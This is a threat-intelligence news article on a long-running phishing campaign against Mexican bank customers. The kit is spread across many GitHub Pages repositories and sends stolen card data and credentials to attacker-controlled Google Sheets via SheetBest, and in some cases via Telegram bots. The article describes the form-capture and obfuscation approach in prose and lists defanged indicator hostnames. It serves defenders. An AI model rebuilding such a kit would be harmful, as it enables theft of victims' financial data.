A sophisticated, long-running phishing operation has evolved into a serverless, modular campaign that weaponizes GitHub Pages to harvest payment card data, credentials, and customer identifiers from banking customers in Mexico.
The campaign’s architecture centers on a phishing kit containing a selector panel that operators use to generate institution-specific landing pages.
Those landing pages impersonate at least a dozen financial institutions, supporting both desktop and mobile interfaces to maximize victim engagement.
Rather than relying on a single domain, operators deployed the kit across more than a hundred GitHub Pages repositories, each publishing cloned pages under varied directory paths (for example /cancelacion/, /soporte/, /mb1/) to increase redundancy, evade takedown, and enable rapid redeployment when individual repositories are removed.
Group-IB researchers have attributed the campaign persistence, scale, and operational discipline to a reusable phishing kit that combines distributed GitHub Pages hosting, obfuscated client-side scripts, and third-party APIs most notably SheetBest to exfiltrate stolen data.
Technically, the attack flow is multi-stage. Victims are lured to a trust-building impersonation page and then redirected to credential-harvesting forms that mimic legitimate banking login workflows.
Modular Phishing Kit Uses GitHub Pages
The pages attach JavaScript submit listeners that call e.preventDefault(), serialize form field values into JSON, and POST them to SheetBest API endpoints.
Those requests populate attacker-controlled Google Sheets in real time, eliminating the need to maintain command-and-control servers.
Group-IB identified several SheetBest endpoints associated with the campaign, all resolving to the same backend IP, and observed identical submission logic reused across multiple templates strong indicators of a centralized, serverless exfiltration backend supporting a many-to-one data collection model.
To complicate detection, phishing pages load obfuscated external JavaScript through randomized paths rather than embedding logic directly in HTML.
Payload rotation is possible without changing the visible page, undermining signature-based detection. Some instances also used hardcoded Telegram bot tokens and chat IDs to forward stolen credentials in real time, illustrating operational flexibility in exfiltration channels.
Repository metadata and commit histories reveal active maintenance by multiple operator accounts over more than a year, with continuous commits, template updates, and endpoint rotations.
Deployment leveraged Jekyll-based GitHub Pages builds and GitHub Actions for automation, and pages included Open Graph metadata to craft convincing link previews for messaging apps.
A robots noindex,nofollow directive confirmed these pages were not intended for organic discovery but for targeted distribution via SMS, WhatsApp, Telegram, or social media, where link previews can substantially increase click-through rates.
This campaign underscores a maturing trend: threat actors are abusing reputable cloud platforms’ trust, HTTPS, and deployment ease to conduct resilient phishing at scale.
By exploiting services like GitHub Pages and SheetBest, attackers reduce their infrastructure footprint and complicate attribution and takedown efforts.
For defenders, the implications are clear traditional blocklists and domain blacklisting are insufficient.
Financial institutions and security teams must prioritize behavioral detections, continuous monitoring for brand impersonation across developer and hosting platforms, rapid takedown coordination with service providers, and sector-wide intelligence sharing.
Indicators of Compromise (IOCs)
| # | Hostname | Count |
|---|---|---|
| 1 | soporte-index25.github[.]io | 2 |
| 2 | soporte-index09.github[.]io | 2 |
| 3 | sntdr-soporte25.github[.]io | 1 |
| 4 | sntdr-soporte25.github[.]io | 1 |
| 5 | 07-soporte.github[.]io | 2 |
| 6 | soporte2507.github[.]io | 2 |
| 7 | soporte160625.github[.]io | 3 |
| 8 | soporte250324.github[.]io | 2 |
| 9 | soporte74.github[.]io | 4 |
| 10 | soporte-bm1.github[.]io | 1 |
| 11 | soporte-r5.github[.]io | 3 |
| 12 | api.sheetbest.com | 2 |
| 13 | soporte0625.github[.]io | 2 |
| 14 | soporte200525.github[.]io | 2 |
| 15 | soporte2650.github[.]io | 1 |
| 16 | soporte-bn1.github[.]io | 1 |
| 17 | soporte-b2.github[.]io | 1 |
| 18 | soporte-index.github[.]io | 2 |
| 19 | soporte-c1.github[.]io | 1 |
| 20 | soporte-b4.github[.]io | 1 |
| 21 | sntndr25-soporte.github[.]io | 2 |
| 22 | sntndr-soporte0825.github[.]io | 2 |
| 23 | 0825-soporte.github[.]io | 2 |
| 24 | soporte-07-25.github[.]io | 2 |
| 25 | soporte-0725.github[.]io | 2 |
| 26 | 0725soporte.github[.]io | 2 |
| 27 | soporte0725-3.github[.]io | 2 |
| 28 | soporte0725.github[.]io | 2 |
| 29 | soporteyatencionf.github[.]io | 2 |
| 30 | 0725-soporte.github[.]io | 2 |
| 31 | soporte-y-atencion.github[.]io | 1 |
| 32 | soporter03.github[.]io | 1 |
| 33 | respaldo94.github[.]io | 2 |
| 34 | soporte-index05.github[.]io | 1 |
| 35 | soporte-b1.github[.]io | 1 |
| 36 | soporte0625.github[.]io | 2 |
| 37 | soporte250324.github[.]io | 2 |
| 38 | fldsmdfr-94.github[.]io | 2 |
| 39 | support-vh.github[.]io | 1 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
